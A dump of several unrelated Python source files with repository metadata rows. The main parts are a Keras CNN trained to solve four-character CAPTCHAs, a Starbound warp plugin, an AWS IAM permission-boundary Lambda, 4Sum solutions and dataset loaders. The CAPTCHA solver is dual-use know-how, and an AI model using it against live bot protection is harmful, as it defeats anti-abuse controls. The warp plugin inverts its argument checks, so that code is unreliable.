ALPHABET = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U',
'V', 'W', 'X', 'Y', 'Z']
IMAGE_HEIGHT = 64
IMAGE_WIDTH = 128
CHAR_SET = number + alphabet + ALPHABET
CAPTCHA_SIZE = 4
def captcha_cnn():
input_tensor = tf.keras.Input(shape=(IMAGE_HEIGHT, IMAGE_WIDTH, 3))
x = input_tensor
for i, n in enumerate([2,2,2,2]):
for _ in range(n):
x = tf.keras.layers.Conv2D(32*2**min(i, 3), kernel_size=3, padding='same', activation='relu', kernel_initializer='he_uniform')(x)
x = tf.keras.layers.BatchNormalization()(x)
x = tf.keras.layers.ReLU()(x)
x = tf.keras.layers.MaxPool2D((2, 2), strides=2)(x)
x = tf.keras.layers.Dropout(0.2)(x) if i == 0 or i == 3 else x
x = tf.keras.layers.Flatten()(x)
output_tensor = [tf.keras.layers.Dense(len(CHAR_SET), activation='softmax', name='c%d'%(i+1))(x) for i in range(CAPTCHA_SIZE)]
model = tf.keras.Model(input_tensor, output_tensor)
#model.summary()
return model
class batchpic(object):
def __init__(self, char_set, batch_size, captcha_size, batch_type='train_data'):
self.char_set = ''.join(char_set)
self.batch_size = batch_size
self.captcha_size = captcha_size
self.captchalist = self._random_captcha_list()
self.batch_type = batch_type
def _random_captcha_list(self):
captcha = set()
while len(captcha) < self.batch_size:
random_str = ''.join([random.choice(self.char_set) for j in range(self.captcha_size)])
captcha.add(random_str)
return list(captcha)
def _createpicbyImageCaptcha(self, chars):
generator=ImageCaptcha(width=IMAGE_WIDTH,height=IMAGE_HEIGHT)
img = generator.generate_image(chars)
return img, chars
def _createpicbygvcode(self):
return gvcode.generate(size=(IMAGE_WIDTH,IMAGE_HEIGHT))
def getpatches(self):
batch_x = np.zeros((self.batch_size, IMAGE_HEIGHT, IMAGE_WIDTH, 3))
batch_y = [np.zeros((self.batch_size, len(self.char_set)), dtype=np.uint8) for i in range(self.captcha_size)]
for i in range(self.batch_size):
if self.batch_type == 'train_data':
x, y = self._createpicbyImageCaptcha(self.captchalist[i])
else:
x, y = self._createpicbygvcode()
x = np.array(x, 'd')
x = tf.convert_to_tensor(x)
x /= 255.
x = tf.reshape(x, (IMAGE_HEIGHT, IMAGE_WIDTH, 3))
batch_x[i, :] = x
for j, ch in enumerate(y):
batch_y[j][i, :] = 0
batch_y[j][i, self.char_set.index(ch)] = 1
return batch_x, batch_y
def vec2text(self, vec):
text = []
for item in vec:
index = item[0]
text.append(self.char_set[index])
return ''.join(text)
class TrainAndPredict(object):
def __init__(self, modelpath, batch_size, charset, captcha_size, epochs):
self.model = captcha_cnn()
self.modelpath = modelpath
try:
self.model.load_weights(self.modelpath + 'captcha_cnn_best.h5')
self.model.compile(optimizer=tf.keras.optimizers.Adam(1e-4, amsgrad=True),
loss='categorical_crossentropy',
metrics=['accuracy'])
except Exception as identifier:
print(identifier)
self.model.compile(optimizer=tf.keras.optimizers.Adam(1e-3, amsgrad=True),
loss='categorical_crossentropy',
metrics=['accuracy'])
self.callbacks = [tf.keras.callbacks.EarlyStopping(patience=3),
tf.keras.callbacks.CSVLogger(self.modelpath + 'log/captcha_cnn.csv', append=True),
tf.keras.callbacks.ModelCheckpoint(self.modelpath + 'captcha_cnn_best.h5', save_best_only=True)]
self.batch_size = batch_size
self.charset = charset
self.captcha_size = captcha_size
self.epochs = epochs
def train(self, times):
#train_type = 'train_data' if times % 2 == 0 else 'diff_data'
train_type = 'train_data'
train_data = batchpic(self.charset, self.batch_size, self.captcha_size, train_type)
validation_data = batchpic(self.charset, 100, self.captcha_size, train_type)
train_images, train_labels = train_data.getpatches()
test_images, test_labels = validation_data.getpatches()
self.model.fit(train_images, train_labels, epochs=self.epochs,
validation_data=(test_images, test_labels), workers=4, use_multiprocessing=True,
callbacks=self.callbacks)
if times % 100 == 0:
print('times:', times)
self.predict()
def predict(self):
success, succ, count = 0, 0, 100
print('ing...')
for _ in range(count):
test_data = batchpic(self.charset, 1, self.captcha_size)
data_x, data_y = test_data.getpatches()
prediction_value = self.model.predict(data_x)
data_y = test_data.vec2text(np.argmax(data_y, axis=2))
prediction_value = test_data.vec2text(np.argmax(prediction_value, axis=2))
success += 1 if data_y.upper() == prediction_value.upper() else 0
########################
diff_test_data = batchpic(self.charset, 1, self.captcha_size, 'diff_data')
diff_data_x, diff_data_y = diff_test_data.getpatches()
diff_prediction_value = self.model.predict(diff_data_x)
diff_data_y = diff_test_data.vec2text(np.argmax(diff_data_y, axis=2))
diff_prediction_value = diff_test_data.vec2text(np.argmax(diff_prediction_value, axis=2))
succ += 1 if diff_data_y.upper() == diff_prediction_value.upper() else 0
print('captcha 数据(', count, '次)预测', '成功率 :{:5.2%}'.format(success / count))
print('gvcode 数据(', count, '次)预测', '成功率 :{:5.2%}'.format(succ / count))
if __name__ == '__main__':
MODEL_PATH = "/content/drive/APP/keras_cnn/"
#MODEL_PATH = './keras_cnn/'
BATCH_SIZE = 1024
EPOCHS = 100
cacnn = TrainAndPredict(MODEL_PATH, BATCH_SIZE, CHAR_SET, CAPTCHA_SIZE, EPOCHS)
for i in range(1000):
print('times:', i)
cacnn.train(i)
cacnn.predict() | 37.681319 | 141 | 0.594051 | 5,100 | 0.739774 | 0 | 0 | 0 | 0 | 0 | 0 | 781 | 0.113287 |
2194785ae66285d905bdd54bde253e59e60bc9d5 | 1,476 | py | Python | progs/PyEpoch-master/PyEpoch-master/example.py | am-3/TimeZoned | e8ae2e90c2d6addf13b145aa2a4c7a9a66c1346e | [
"MIT"
] | null | null | null | progs/PyEpoch-master/PyEpoch-master/example.py | am-3/TimeZoned | e8ae2e90c2d6addf13b145aa2a4c7a9a66c1346e | [
"MIT"
] | null | null | null | progs/PyEpoch-master/PyEpoch-master/example.py | am-3/TimeZoned | e8ae2e90c2d6addf13b145aa2a4c7a9a66c1346e | [
"MIT"
] | null | null | null | # PyEpoch Module Example File.
import pyepoch
# -- TODAY() --
# The today() function returns today's date.
today = pyepoch.today()
print("Today's date & time:")
print(today)
# -- TIMEZONE() --
# The timezone() function returns a date with a different timezone.
# timezone() takes two(2) arguments:
# - date = a date to be converted.
# - tz = the timezone to convert to (ex. 'US/Pacific').
today_pst = pyepoch.timezone(today, 'US/Pacific')
print('Today\'s date & time in Pacific time:')
print(today_pst)
# -- TIMEZONE_SET() --
# The timezone_set() function returns a date with a different timezone and new hour/minute/second values.
# timezone_set() takes five(5) arguments:
# - date = a date to be converted.
# - tz = the timezone to convert to (ex. 'US/Pacific').
# - h = hour, changes the hour of the output.
# - m = minute, changes the minute of the output.
# - s = second, changes the second(s) of the output.
time = pyepoch.timezone_set(today, 'US/Pacific', 8, 0, 0)
print('Today\'s date at 8 o\'clock Pacific time: ')
print(time)
# -- EPOCH_SEC() --
# The PyEpoch_sec() function returns the number of seconds since the UNIX epoch (1970, 1, 1) up to the provided date.
# timezone_set() takes two(2) arguments:
# - date = a date to be converted.
# - tz = the timezone as a string, (ex. 'US/Pacific').
sec = pyepoch.epoch_sec(today_pst, 'US/Pacific')
print('Todays\'s date & time in Pacific time as seconds since the Unix epoch: ')
print(sec)
| 31.404255 | 117 | 0.680217 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,198 | 0.811653 |
2195d746a275485f7b8e060e078812f4fd92ce29 | 9,615 | py | Python | plugins.disable/warpy_plugin/warpy_plugin.py | StarryPy/StarryPy-Historic | b9dbd552b8c4631a5a8e9dda98b7ba447eca59da | [
"WTFPL"
] | 38 | 2015-02-12T11:57:59.000Z | 2018-11-15T16:03:45.000Z | plugins.disable/warpy_plugin/warpy_plugin.py | StarryPy/StarryPy-Historic | b9dbd552b8c4631a5a8e9dda98b7ba447eca59da | [
"WTFPL"
] | 68 | 2015-02-05T23:29:47.000Z | 2017-12-27T08:26:25.000Z | plugins.disable/warpy_plugin/warpy_plugin.py | StarryPy/StarryPy-Historic | b9dbd552b8c4631a5a8e9dda98b7ba447eca59da | [
"WTFPL"
] | 21 | 2015-02-06T18:58:21.000Z | 2017-12-24T20:08:59.000Z | # -*- coding: UTF-8 -*-
from base_plugin import SimpleCommandPlugin
from plugins.core.player_manager_plugin import permissions, UserLevels
from utility_functions import build_packet, move_ship_to_coords, extract_name
from packets import (
Packets,
WarpAliasType,
WarpWorldType,
WarpActionType,
player_warp,
player_warp_toworld_write,
player_warp_toplayer_write,
player_warp_toalias_write,
fly_ship,
fly_ship_write
)
class Warpy(SimpleCommandPlugin):
"""
Plugin that allows privileged players to warp around as they like.
"""
name = 'warpy_plugin'
depends = ['command_plugin', 'player_manager_plugin']
commands = ['warp', 'warp_ship', 'outpost']
def activate(self):
super(Warpy, self).activate()
self.player_manager = self.plugins[
'player_manager_plugin'
].player_manager
@permissions(UserLevels.MODERATOR)
def warp(self, name):
"""
Warps you to a player's ship (or player to player).
Syntax: /warp [player] (to player)
"""
if name:
self.protocol.send_chat_message(self.warp.__doc__)
return
try:
first_name, rest = extract_name(name)
except ValueError as e:
self.protocol.send_chat_message(str(e))
return
if not rest:
self.warp_self_to_player([first_name])
else:
try:
second_name = extract_name(rest)[0]
except ValueError as e:
self.protocol.send_chat_message(str(e))
return
self.warp_player_to_player(first_name, second_name)
@permissions(UserLevels.ADMIN)
def warp_ship(self, location):
"""
Warps a player ship to another players ship.
Syntax: /warp_ship [player] (to player)
"""
if location:
self.protocol.send_chat_message(self.warp_ship.__doc__)
return
try:
first_name, rest = extract_name(location)
except ValueError as e:
self.protocol.send_chat_message(str(e))
return
if not rest:
self.move_own_ship_to_player(first_name)
else:
try:
second_name = extract_name(rest)[0]
except ValueError as e:
self.protocol.send_chat_message(str(e))
return
self.move_player_ship_to_other(first_name, second_name)
@permissions(UserLevels.MODERATOR)
def outpost(self, name):
"""
Warps you (or another player) to the outpost.
Syntax: /outpost [player]
"""
if name:
self.warp_player_to_outpost(self.protocol.player.name)
else:
try:
player_name, rest = extract_name(name)
except ValueError as e:
self.protocol.send_chat_message(str(e))
return
self.warp_player_to_outpost(player_name)
def warp_self_to_player(self, name):
self.logger.debug(
'Warp command called by %s to %s', self.protocol.player.name, name
)
name = ' '.join(name)
self.warp_player_to_player(self.protocol.player.name, name)
def warp_player_to_player(self, from_string, to_string):
self.logger.debug(
'Warp player-to-player command called by %s: %s to %s',
self.protocol.player.name, from_string, to_string
)
from_player = self.player_manager.get_logged_in_by_name(from_string)
to_player = self.player_manager.get_logged_in_by_name(to_string)
if from_player is not None:
if to_player is not None:
from_protocol = self.factory.protocols[from_player.protocol]
if from_player is not to_player:
self.logger.debug('target: %s', to_player.uuid)
warp_packet = build_packet(
Packets.PLAYER_WARP,
player_warp_toplayer_write(uuid=to_player.uuid)
)
else:
warp_packet = build_packet(
Packets.PLAYER_WARP,
player_warp_toalias_write(alias=WarpAliasType.SHIP)
)
from_protocol.client_protocol.transport.write(warp_packet)
if from_string != to_string:
self.protocol.send_chat_message(
'Warped ^yellow;{}^green;'
' to ^yellow;{}^green;.'.format(from_string, to_string)
)
else:
self.protocol.send_chat_message(
'Warped to ^yellow;{}^green;.'.format(to_string)
)
else:
self.protocol.send_chat_message(
'No player by the name ^yellow;{}^green; found.'.format(
to_string
)
)
self.protocol.send_chat_message(self.warp.__doc__)
return
else:
self.protocol.send_chat_message(
'No player by the name ^yellow;{}^green; found.'.format(
to_player
)
)
self.protocol.send_chat_message(self.warp.__doc__)
def move_player_ship(self, protocol, location):
if len(location) < 5:
self.logger.warning(
'Couldn\'t derive a warp location in move_player_ship. '
'Coordinates given: ^cyan;%s',
':'.join(location)
)
self.protocol.send_chat_message('Sorry, an error occurred.')
return
if len(location) == 5:
satellite = 0
else:
satellite = int(location.pop())
planet = int(location.pop())
z = int(location.pop())
y = int(location.pop())
x = int(location.pop())
move_ship_to_coords(protocol, x, y, z, planet, satellite)
def move_own_ship_to_player(self, player_name):
t = self.player_manager.get_logged_in_by_name(player_name)
if t is None:
self.protocol.send_chat_message(
'No player by the name ^yellow;{}^green; found.'.format(
player_name
)
)
self.protocol.send_chat_message(self.warp.__doc__)
return
if not t.planet:
self.protocol.send_chat_message(
'Sorry, we don\'t have a tracked planet location for '
'^yellow;{}^green;. Perhaps they haven\'t warped down '
'to a planet since logging in?'.format(t.name)
)
return
self.move_player_ship(self.protocol, t.planet.split(':'))
self.protocol.send_chat_message(
'Warp drive engaged. Warping to ^yellow;{}^green;.'.format(
player_name
)
)
def move_player_ship_to_other(self, from_player, to_player):
f = self.player_manager.get_logged_in_by_name(from_player)
t = self.player_manager.get_logged_in_by_name(to_player)
if f is None:
self.protocol.send_chat_message(
'No player by the name ^yellow;{}^green; found.'.format(
from_player
)
)
self.protocol.send_chat_message(self.warp.__doc__)
return
if t is None:
self.protocol.send_chat_message(
'No player by the name ^yellow;{}^green; found.'.format(
to_player
)
)
self.protocol.send_chat_message(self.warp.__doc__)
return
if not t.planet:
self.protocol.send_chat_message(
'Sorry, we don\'t have a tracked planet location for {}. '
'Perhaps they haven\'t warped to'
' a planet since logging in?'.format(to_player)
)
return
self.move_player_ship(
self.factory.protocols[f.protocol], t.planet.split(':')
)
self.protocol.send_chat_message(
'Warp drive engaged. Warping '
'^yellow;{}^green; to ^yellow;{}^green;.'.format(
from_player, to_player
)
)
def warp_player_to_outpost(self, player_string):
self.logger.debug(
'Warp player-to-outpost command called by %s: '
'sending %s to the outpost',
self.protocol.player.name, player_string
)
player_to_send = self.player_manager.get_logged_in_by_name(
player_string
)
if player_to_send is not None:
player_protocol = self.factory.protocols[player_to_send.protocol]
warp_packet = build_packet(
Packets.PLAYER_WARP,
player_warp_toworld_write(
world_type=WarpWorldType.UNIQUE_WORLD,
destination='outpost'
)
)
player_protocol.client_protocol.transport.write(warp_packet)
self.protocol.send_chat_message(
'Warped ^yellow;{}^green; to the outpost.'.format(
player_string
)
)
else:
self.protocol.send_chat_message(
'No player by the name ^yellow;{}^green; found.'.format(
player_string
)
)
self.protocol.send_chat_message(self.warp.__doc__)
| 36.83908 | 79 | 0.555174 | 9,156 | 0.952262 | 0 | 0 | 2,107 | 0.219137 | 0 | 0 | 1,643 | 0.170879 |
2197966d631c9c92b13301a3f1143b67b6729392 | 1,735 | py | Python | sum/4-sum-II.py | windowssocket/py_leetcode | 241dbf8d7dab7db5215c2526321fcdb378b45492 | [
"Apache-2.0"
] | 3 | 2018-05-29T02:29:40.000Z | 2020-02-05T03:28:16.000Z | sum/4-sum-II.py | xidongc/py_leetcode | 241dbf8d7dab7db5215c2526321fcdb378b45492 | [
"Apache-2.0"
] | 1 | 2019-03-08T13:22:32.000Z | 2019-03-08T13:22:32.000Z | sum/4-sum-II.py | xidongc/py_leetcode | 241dbf8d7dab7db5215c2526321fcdb378b45492 | [
"Apache-2.0"
] | 3 | 2018-05-29T11:50:24.000Z | 2018-11-27T12:31:01.000Z | # LTE using two pointers O(n**3)
class Solution(object):
def fourSumCount(self, A, B, C, D):
# corner case:
if len(A) == 0:
return 0
A.sort()
B.sort()
C.sort()
D.sort()
count = 0
for i in range(len(A)):
for j in range(len(B)):
k = 0
t = len(D) - 1
while 0 <= k < len(C) and 0 <= t < len(D):
if A[i] + B[j] + C[k] + D[t] > 0:
t -= 1
elif A[i] + B[j] + C[k] + D[t] < 0:
k += 1
else:
tmp1 = 1
tmp2 = 1
while 0 <= k < len(C) - 1 and C[k + 1] == C[k]:
k += 1
tmp1 += 1
while 1 <= t < len(D) and D[t - 1] == D[t]:
t -= 1
tmp2 += 1
count += tmp1 * tmp2
k += 1
t -= 1
return count
# hashmap Solution AC O(n**2)
class Solution(object):
def fourSumCount(self, A, B, C, D):
"""
:type A: List[int]
:type B: List[int]
:type C: List[int]
:type D: List[int]
:rtype: int
"""
hashtable = {}
count = 0
for a in A:
for b in B:
if a+b in hashtable:
hashtable[a+b] += 1
else:
hashtable[a+b] = 1
for c in C:
for d in D:
if -c-d in hashtable:
count += hashtable[-c-d]
return count | 26.287879 | 71 | 0.311816 | 1,669 | 0.96196 | 0 | 0 | 0 | 0 | 0 | 0 | 218 | 0.125648 |
219817d56a9878e2e56c8fd6d1d6e60bcea7971d | 1,693 | py | Python | event/filetype_check_pull_request_handler.py | micnncim/spinnakerbot | 449a1ba76c62619b515691dbd21f791f5f1d3e5b | [
"Apache-2.0"
] | null | null | null | event/filetype_check_pull_request_handler.py | micnncim/spinnakerbot | 449a1ba76c62619b515691dbd21f791f5f1d3e5b | [
"Apache-2.0"
] | null | null | null | event/filetype_check_pull_request_handler.py | micnncim/spinnakerbot | 449a1ba76c62619b515691dbd21f791f5f1d3e5b | [
"Apache-2.0"
] | null | null | null | from .handler import Handler
from .pull_request_event import GetPullRequest, GetRepo
format_message = ('We prefer that non-test backend code be written in Java or Kotlin, rather ' +
'than Groovy. The following files have been added and written in Groovy:\n\n' +
'{}\n\n' +
'See our server-side [commit conventions here](https://www.spinnaker.io/community/contributing/back-end-code/#choice-of-language).')
class FiletypeCheckPullRequestHandler(Handler):
def __init__(self):
super().__init__()
self.omit_repos = self.config.get('omit_repos', [])
def handles(self, event):
return (event.type == 'PullRequestEvent'
and event.payload.get('action') == 'opened')
def handle(self, g, event):
repo = GetRepo(event)
if repo in self.omit_repos:
self.logging.info('Skipping {} because it\'s in omitted repo {}'.format(event, repo))
return
pull_request = GetPullRequest(g, event)
if pull_request is None:
self.logging.warn('Unable to determine PR that created {}'.format(event))
return
files = pull_request.get_files()
bad_files = []
for f in files:
if not f.status == 'added':
continue
if not f.filename.endswith('.groovy'):
continue
if 'src/test' in f.filename:
continue
bad_files.append(f)
if len(bad_files) > 0:
pull_request.create_issue_comment(format_message.format(
'\n\n'.join(map(lambda f: '* {}'.format(f.filename), bad_files))))
FiletypeCheckPullRequestHandler()
| 36.021277 | 140 | 0.606615 | 1,224 | 0.722977 | 0 | 0 | 0 | 0 | 0 | 0 | 462 | 0.272888 |
21995407ba2e718df75670c68ae5c377959bb276 | 96 | py | Python | venv/lib/python3.8/site-packages/virtualenv/create/via_global_ref/builtin/cpython/cpython3.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/virtualenv/create/via_global_ref/builtin/cpython/cpython3.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/virtualenv/create/via_global_ref/builtin/cpython/cpython3.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/8f/3e/26/6ee86ef4171b7194b098a053f1e488bca8ba920931fd5f9fb809ad9a37 | 96 | 96 | 0.895833 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
21997f6cf26e1689e600188920ad6640d1b47a5e | 4,231 | py | Python | deployment/code/scp-03-Permission.py | weiping-bj/SCP-Workaround-in-AWS-ChinaRegions | f8feeed0fa568cf01b35e092681a975c5b7a8c54 | [
"MIT"
] | 1 | 2021-11-08T06:10:40.000Z | 2021-11-08T06:10:40.000Z | deployment/code/scp-03-Permission.py | weiping-bj/SCP-Workaround-in-AWS-ChinaRegions | f8feeed0fa568cf01b35e092681a975c5b7a8c54 | [
"MIT"
] | null | null | null | deployment/code/scp-03-Permission.py | weiping-bj/SCP-Workaround-in-AWS-ChinaRegions | f8feeed0fa568cf01b35e092681a975c5b7a8c54 | [
"MIT"
] | 1 | 2022-03-30T06:24:16.000Z | 2022-03-30T06:24:16.000Z | import json
import os
import boto3
topicArn = os.environ['TOPIC_ARN']
assumedRole = os.environ['ASSUMED_ROLE']
scpBoundary = os.environ['SCP_BOUNDARY_POLICY']
sns_client = boto3.client('sns')
sts_client = boto3.client('sts')
def lambda_handler(event, context):
print(event)
accountID = event['account']
assumeRoleARN = "arn:aws-cn:iam::" + accountID + ":role/" + assumedRole
Credentials = sts_client.assume_role(
RoleArn=assumeRoleARN,
RoleSessionName="LoginAccount",
DurationSeconds=900)
print(Credentials)
SCP_BOUNDARY = "arn:aws-cn:iam::" + accountID + ":policy/" + scpBoundary
if event['detail']['userIdentity']['type'] == "IAMUser":
Creator_Name = event['detail']['userIdentity']['userName']
Creator_Type = "USER"
elif event['detail']['userIdentity']['type'] == "AssumedRole":
Creator_Name = event['detail']['userIdentity']['sessionContext']['sessionIssuer']['userName']
Creator_Type = "ROLE"
# 判断,User 和 Role 分别处理
if event['detail']['eventName'] == "CreateUser":
identityArn, rspAction = processUser(event, SCP_BOUNDARY, Creator_Name, Creator_Type, Credentials)
Operation_Type="IAM User Creation"
elif event['detail']['eventName'] == "CreateRole":
identityArn, rspAction = processRole(event, SCP_BOUNDARY, Creator_Name, Creator_Type, Credentials)
Operation_Type="IAM Role Creation"
else:
print("Others")
# 发 SNS 通知消息
output = {
"Operation Type": Operation_Type,
"Identity ARN": identityArn,
"Creator Type": Creator_Type,
"Creator Name": Creator_Name,
"Respond Action": rspAction}
print(output)
sns_client.publish(
TopicArn=topicArn,
Subject=Operation_Type,
Message=json.dumps(output, indent=2))
return {
'statusCode': 200
}
def processRole(event, boundaryArn, creatorName, creatorType, Credentials):
Role_Arn = event['detail']['responseElements']['role']['arn']
Role_Name = Role_Arn.split('/')[-1]
iam_client = boto3.client(
'iam',
aws_access_key_id=Credentials['Credentials']['AccessKeyId'],
aws_secret_access_key=Credentials['Credentials']['SecretAccessKey'],
aws_session_token=Credentials['Credentials']['SessionToken'])
iam_client.put_role_permissions_boundary(
RoleName=Role_Name,
PermissionsBoundary=boundaryArn
)
Role_Info = iam_client.get_role(RoleName=Role_Name)['Role']['AssumeRolePolicyDocument']['Statement'][0]['Principal']
if "Federated" in Role_Info:
trustedIdt = "Federated"
elif "Service" in Role_Info:
trustedIdt = Role_Info['Service'].split('.')[-3]
else:
trustedIdt = Role_Info['AWS'].split(':')[4]
iam_client.tag_role(
RoleName=Role_Name,
Tags=[
{
'Key': 'Creator Name',
'Value': creatorName
},
{
'Key': 'Creator Type',
'Value': creatorType
},
{
'Key': 'Trusted Identi',
'Value': trustedIdt
}
]
)
Action="Tagged"
return Role_Arn, Action
def processUser(event, boundaryArn, creatorName, creatorType, Credentials):
User_Name = event['detail']['responseElements']['user']['userName']
User_Arn = event['detail']['responseElements']['user']['arn']
iam_client = boto3.client(
'iam',
aws_access_key_id=Credentials['Credentials']['AccessKeyId'],
aws_secret_access_key=Credentials['Credentials']['SecretAccessKey'],
aws_session_token=Credentials['Credentials']['SessionToken'])
iam_client.put_user_permissions_boundary(
UserName=User_Name,
PermissionsBoundary=boundaryArn
)
iam_client.tag_user(
UserName=User_Name,
Tags=[
{
'Key': 'Creator Name',
'Value': creatorName
},
{
'Key': 'Creator Type',
'Value': creatorType
}
]
)
Action = "Tagged"
return User_Arn, Action | 32.05303 | 120 | 0.605294 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,119 | 0.262861 |
219a50648cf64b278567555f4d618a30757f4bc1 | 1,200 | py | Python | betfairlightweight/endpoints/navigation.py | rozzac90/betfair | de885adf308e48bfc2614df46a5375a7df6386ef | [
"MIT"
] | 1 | 2020-04-15T22:17:26.000Z | 2020-04-15T22:17:26.000Z | betfairlightweight/endpoints/navigation.py | rozzac90/betfair | de885adf308e48bfc2614df46a5375a7df6386ef | [
"MIT"
] | null | null | null | betfairlightweight/endpoints/navigation.py | rozzac90/betfair | de885adf308e48bfc2614df46a5375a7df6386ef | [
"MIT"
] | 1 | 2021-04-26T14:47:28.000Z | 2021-04-26T14:47:28.000Z | from requests import ConnectionError
from ..exceptions import APIError
from ..utils import check_status_code
from .baseendpoint import BaseEndpoint
class Navigation(BaseEndpoint):
"""
Navigation operations.
"""
def list_navigation(self, session=None):
"""
This Navigation Data for Applications service allows the retrieval of the
full Betfair market navigation menu from a compressed file.
:param requests.session session: Requests session object
:rtype: json
"""
return self.request(session=session)
def request(self, method=None, params=None, session=None):
session = session or self.client.session
try:
response = session.get(self.url, headers=self.client.request_headers,
timeout=(self.connect_timeout, self.read_timeout))
except ConnectionError:
raise APIError(None, method, params, 'ConnectionError')
except Exception as e:
raise APIError(None, method, params, e)
check_status_code(response)
return response.json()
@property
def url(self):
return self.client.navigation_uri
| 30 | 85 | 0.66 | 1,048 | 0.873333 | 0 | 0 | 70 | 0.058333 | 0 | 0 | 308 | 0.256667 |
219aa4d5dddc72d3249a60a8339ee2344c7a1e6b | 3,733 | py | Python | datasets/fbp_dataset.py | Zumo09/Feedback-Prize | e7e7343a81bfec2f5b187f2266154da0bbe48fb9 | [
"MIT"
] | null | null | null | datasets/fbp_dataset.py | Zumo09/Feedback-Prize | e7e7343a81bfec2f5b187f2266154da0bbe48fb9 | [
"MIT"
] | null | null | null | datasets/fbp_dataset.py | Zumo09/Feedback-Prize | e7e7343a81bfec2f5b187f2266154da0bbe48fb9 | [
"MIT"
] | null | null | null | import os
from tqdm import tqdm
from functools import reduce
from typing import Dict, List, Callable, Tuple
import numpy as np
import pandas as pd
from sklearn.preprocessing import OrdinalEncoder
import torch
from torch.utils.data import Dataset
class FBPDataset(Dataset):
def __init__(
self,
documents: pd.Series,
tags: pd.DataFrame,
encoder: OrdinalEncoder,
align_target: bool,
):
self.documents = documents
self.tags = tags
self.encoder = encoder
self.align_target = align_target
def __len__(self):
return len(self.documents)
def __getitem__(self, index) -> Tuple[str, Dict, Dict]:
doc_name = self.documents.index[index]
doc_tags = self.tags[self.tags["id"] == doc_name] # type: ignore
tag_cats = (
torch.Tensor(
self.encoder.transform(
np.array(doc_tags["discourse_type"]).reshape(-1, 1)
)
)
.squeeze()
.long()
)
document = self.documents[doc_name]
len_sequence = len(document.split()) # type: ignore
if self.align_target:
boxes = torch.Tensor(doc_tags[["box_center", "box_length"]].values)
else:
boxes = self.map_pred(doc_tags["predictionstring"], len_sequence)
target = {"labels": tag_cats, "boxes": boxes}
info = {"id": doc_name, "length": len_sequence}
return document, target, info # type: ignore
@staticmethod
def map_pred(pred, len_sequence):
tag_boxes = []
for p in pred:
p = p.split()
p = [int(n) for n in p]
p = torch.Tensor(p)
tag_boxes.append([torch.mean(p) / len_sequence, p.size()[0] / len_sequence])
return torch.Tensor(tag_boxes)
class FBPTestDataset(Dataset):
def __init__(
self,
documents: pd.Series,
encoder: OrdinalEncoder,
):
self.documents = documents
self.encoder = encoder
def __len__(self):
return len(self.documents)
def __getitem__(self, index) -> Tuple[str, Dict, Dict]:
doc_name = self.documents.index[index]
document = self.documents[doc_name]
len_sequence = len(document.split()) # type: ignore
info = {"id": doc_name, "length": len_sequence}
return document, info # type: ignore
def load_test_texts(path: str, preprocess: List[Callable[[str], str]]) -> pd.Series:
documents = {}
for f_name in tqdm(os.listdir(path + "test/"), desc=f"Loading Test Dataset"):
doc_name = f_name.replace(".txt", "")
# with open(f_name, 'r') as f:
with open(path + "train/" + f_name, "r") as f:
text = reduce(lambda txt, f: f(txt), preprocess, f.read())
documents[doc_name] = text
return pd.Series(documents) # type: ignore
def load_texts(
path: str, preprocess: List[Callable[[str], str]], dataset_size: float
) -> Tuple[pd.Series, pd.DataFrame]:
documents = {}
listdir = os.listdir(path + "train/")
if dataset_size < 1.0:
size = int(len(listdir) * dataset_size)
listdir = listdir[:size]
for f_name in tqdm(listdir, desc=f"Loading Dataset"):
doc_name = f_name.replace(".txt", "")
# with open(f_name, 'r') as f:
with open(path + "train/" + f_name, "r") as f:
text = reduce(lambda txt, f: f(txt), preprocess, f.read())
documents[doc_name] = text
types = {"discourse_id": "int64", "discourse_start": int, "discourse_end": int}
tags = pd.read_csv(os.path.join(path, "train.csv"), dtype=types)
return pd.Series(documents), tags # type: ignore
| 30.85124 | 88 | 0.595232 | 2,174 | 0.582373 | 0 | 0 | 320 | 0.085722 | 0 | 0 | 417 | 0.111706 |
219b49298771b09ffd76ddb885ed2c8ac603b1e4 | 614 | py | Python | mtw/fl_user/urls.py | sukumar1612/medical-transcription-website | 8ac2aaaec2e93a2f512e9f22fbf805c9c36a0d6d | [
"MIT"
] | 2 | 2021-05-24T06:08:41.000Z | 2021-05-26T19:21:01.000Z | mtw/fl_user/urls.py | sukumar1612/medical-transcription-website | 8ac2aaaec2e93a2f512e9f22fbf805c9c36a0d6d | [
"MIT"
] | null | null | null | mtw/fl_user/urls.py | sukumar1612/medical-transcription-website | 8ac2aaaec2e93a2f512e9f22fbf805c9c36a0d6d | [
"MIT"
] | 3 | 2021-05-22T11:37:30.000Z | 2021-06-01T08:34:01.000Z | from django.urls import path
from fl_user import views
app_name = 'fl_user'
urlpatterns = [
path('receive_data/',views.receive_data, name='receive_data'),
path('doctorhome/', views.doctorhome, name='doctorhome'),
path('fluhome/', views.fluhome, name='fluhome'),
path('sluhome/', views.sluhome, name='sluhome'),
path('view_task_flu/',views.view_task_flu,name="view_task_flu"),
path('view_task_doc/',views.view_task_doc,name="view_task_doc"),
path('view_task_slu/',views.view_task_slu,name="view_task_slu"),
path('generate_report/',views.generate_report,name="generate_report"),
]
| 36.117647 | 74 | 0.726384 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 229 | 0.372964 |
219b950bb1bd75ed87fec4ee388a2ee1d19a75cf | 4,350 | py | Python | check_purefa_hw.py | frank-m/nagios-plugins | 64681d8c89143f9deb9f3bd9a9c2d4e9bd040bb0 | [
"Apache-2.0"
] | null | null | null | check_purefa_hw.py | frank-m/nagios-plugins | 64681d8c89143f9deb9f3bd9a9c2d4e9bd040bb0 | [
"Apache-2.0"
